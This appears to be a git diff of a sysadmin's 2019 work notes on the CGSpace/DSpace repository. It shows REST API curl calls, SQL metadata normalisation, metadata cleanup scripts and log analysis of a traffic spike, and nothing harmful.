    $ curl -f -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
    +
    $ curl -f -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
     curl: (22) The requested URL returned error: 401
     
    • Note that curl only shows the HTTP 401 error if you use -f (fail), and only then if you don’t include -s @@ -1118,19 +1118,19 @@ curl: (22) The requested URL returned error: 401
    -
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
    +
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
      count 
     -------
        376
     (1 row)
     
    -dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
    +dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
      count 
     -------
        149
     (1 row)
     
    -dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
    +dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
      count 
     -------
        417
    @@ -1146,20 +1146,20 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
     
    • Nevertheless, if I request using the null language I get 1020 results, plus 179 for a blank language attribute:
    -
    $ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": null}' | jq length
    +
    $ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": null}' | jq length
     1020
    -$ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": ""}' | jq length
    +$ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": ""}' | jq length
     179
     
    • This is weird because I see 942–1156 items with “WATER MANAGEMENT” (depending on wildcard matching for errors in subject spelling):
    -
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
    +
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
      count 
     -------
        942
     (1 row)
     
    -dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
    +dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
      count 
     -------
       1156
    @@ -1177,13 +1177,13 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
     
     
  • I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:
  • -
    $ curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/login" -d '{"email":"example@me.com","password":"fuuuuu"}'
    -$ curl -f -H "Content-Type: application/json" -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -X GET "https://dspacetest.cgiar.org/rest/status"
    -$ curl -f -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
    +
    $ curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/login" -d '{"email":"example@me.com","password":"fuuuuu"}'
    +$ curl -f -H "Content-Type: application/json" -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -X GET "https://dspacetest.cgiar.org/rest/status"
    +$ curl -f -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
     
    • I created a normal user for Carlos to try as an unprivileged user:
    -
    $ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
    +
    $ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
     
    • But still I get the HTTP 401 and I have no idea which item is causing it
    • I enabled more verbose logging in ItemsResource.java and now I can at least see the item ID that causes the failure… @@ -1212,7 +1212,7 @@ $ curl -f -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b"
      • Export a list of authors for Peter to look through:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
      +
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
       COPY 65752
       

      2019-04-28

        @@ -1262,11 +1262,11 @@ COPY 65752 spa | 2 | 1074345 (11 rows) -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', ''); +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', ''); UPDATE 360295 -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL; +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL; UPDATE 1074345 -dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa'); +dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa'); UPDATE 14
      • Then I exported the whole repository as CSV, imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos
      • diff --git a/docs/2019-05/index.html b/docs/2019-05/index.html index 172bbf571..b275efb6d 100644 --- a/docs/2019-05/index.html +++ b/docs/2019-05/index.html @@ -48,7 +48,7 @@ DELETE 1 But after this I tried to delete the item from the XMLUI and it is still present… "/> - + @@ -168,7 +168,7 @@ dspace=# DELETE FROM item WHERE item_id=74648;
    -
    $ curl -f -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
    +
    $ curl -f -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
     curl: (22) The requested URL returned error: 401 Unauthorized
     
    • The DSpace log shows the item ID (because I modified the error text):
    • @@ -282,52 +282,52 @@ Please see the DSpace documentation for assistance.
      • The number of unique sessions today is ridiculously high compared to the last few days considering it’s only 12:30PM right now:
      -
      $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
      +
      $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
       101108
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
       14618
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
       14946
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
       6410
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
       7758
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
       20528
       
      • The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:
      -
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       7127
      -# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1231
      -# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1255
      -# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1736
      -# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1573
      -# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1410
       
      • Just this morning between the hours of 2 and 6 the number of unique sessions was very high compared to previous mornings:
      -
      $ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       83650
      -$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2547
      -$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2574
      -$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2911
      -$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2704
      -$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       3699
       
      • Most of the requests were GETs:
      -
      # cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E "(GET|HEAD|POST|PUT)" | sort | uniq -c | sort -n
      +
      # cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E "(GET|HEAD|POST|PUT)" | sort | uniq -c | sort -n
             1 PUT
            98 POST
          2845 HEAD
      @@ -336,19 +336,19 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
       
    • I’m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?
    • Looking again, I see 84,000 requests to /handle this morning (not including logs for library.cgiar.org because those get HTTP 301 redirect to CGSpace and appear here in access.log):
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E " /handle/[0-9]+/[0-9]+"
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E " /handle/[0-9]+/[0-9]+"
     84350
     
    • But it would be difficult to find a pattern for those requests because they cover 78,000 unique Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+ HTTP" | sort | uniq | wc -l
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+ HTTP" | sort | uniq | wc -l
     78104
    -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+/(discover|browse)" | wc -l
    +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+/(discover|browse)" | wc -l
     2492
     
    • In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:
    -
    # grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
    +
    # grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
           3 2a01:7e00::f03c:91ff:fe0a:d645
         113 63.32.242.35
     
      @@ -363,28 +363,28 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
      • The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:
      -
      # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +
      # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       13969
      -# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       5936
      -# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       6229
      -# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       8051
       
      • Total number of sessions yesterday was much higher compared to days last week:
      -
      $ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       144160
      -$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       57269
      -$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       58648
      -$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       27883
      -$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       26996
      -$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       61866
       
      • The usage statistics seem to agree that yesterday was crazy:
      • @@ -423,9 +423,9 @@ Please see the DSpace documentation for assistance.
      • Help Moayad with certbot-auto for Let’s Encrypt scripts on the new AReS server (linode20)
      • Normalize all text_lang values for metadata on CGSpace and DSpace Test (as I had tested last month):
      -
      UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
      -UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
      -UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
      +
      UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
      +UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
      +UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
       
      • Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018
          @@ -454,7 +454,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
        • All of the IPs from these networks are using generic user agents like this, but MANY more, and they change many times:
        -
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36"
        +
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36"
         
        • I found a blog post from 2018 detailing an attack from a DDoS service that matches our pattern exactly
        • They specifically mention:
        • @@ -473,7 +473,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
          • I see that the Unpaywall bot is resonsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):
          -
          $ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l   
          +
          $ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l   
           2206
           
          • I added “Unpaywall” to the list of bots in the Tomcat Crawler Session Manager Valve
          • @@ -519,20 +519,20 @@ COPY 995
          • Peter sent me a bunch of fixes for investors from yesterday
          • I did a quick check in Open Refine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:
          -
          $ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          -$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
          +
          $ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          +$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
           
          • Then I started a full Discovery re-indexing:
          -
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
          +
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
           $ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
           
          • I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically
          • Instead, I exported a new list and asked Peter to look at it again
          • Apply Peter’s new corrections on DSpace Test and CGSpace:
          -
          $ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          -$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
          +
          $ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          +$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
           
          • Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (#423)
              @@ -573,16 +573,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
          -
          $ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
          +
          $ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
           
          • Then start a full Discovery re-indexing on each server:
          -
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"                                   
          +
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"                                   
           $ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
           
          • Export new list of all authors from CGSpace database to send to Peter:
          -
          dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
          +
          dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
           COPY 64871
           
          • Run all system updates on DSpace Test (linode19) and reboot it
          • @@ -609,7 +609,7 @@ COPY 64871
          • For now I just created an eperson with her personal email address until I have time to check LDAP to see what’s up with her CGIAR account:
          -
          $ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
          +
          $ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
           
          diff --git a/docs/2019-06/index.html b/docs/2019-06/index.html index f43b00d50..ee49b7231 100644 --- a/docs/2019-06/index.html +++ b/docs/2019-06/index.html @@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it Skype with Marie-Angélique and Abenet about CG Core v2 "/> - + @@ -203,7 +203,7 @@ $ csvcut -l -c 0 /tmp/countries.csv > 2019-06-10-countries.csv
          • Get a list of all the unique AGROVOC subject terms in IITA’s data and export it to a text file so I can validate them with my agrovoc-lookup.py script:
          -
          $ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u > iita-agrovoc.txt
          +
          $ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u > iita-agrovoc.txt
           $ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
           $ wc -l iita-agrovoc*
             402 iita-agrovoc-matches.txt
          @@ -216,7 +216,7 @@ $ wc -l iita-agrovoc*
           
          • Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to id:
          -
          $ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' > 2019-06-10-subjects-matched.csv
          +
          $ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' > 2019-06-10-subjects-matched.csv
           

          2019-06-20

          • Share some feedback about AReS v2 with the colleagues and encourage them to do the same
          • @@ -238,11 +238,11 @@ $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGR
            • Normalize text_lang values for metadata on DSpace Test and CGSpace:
            -
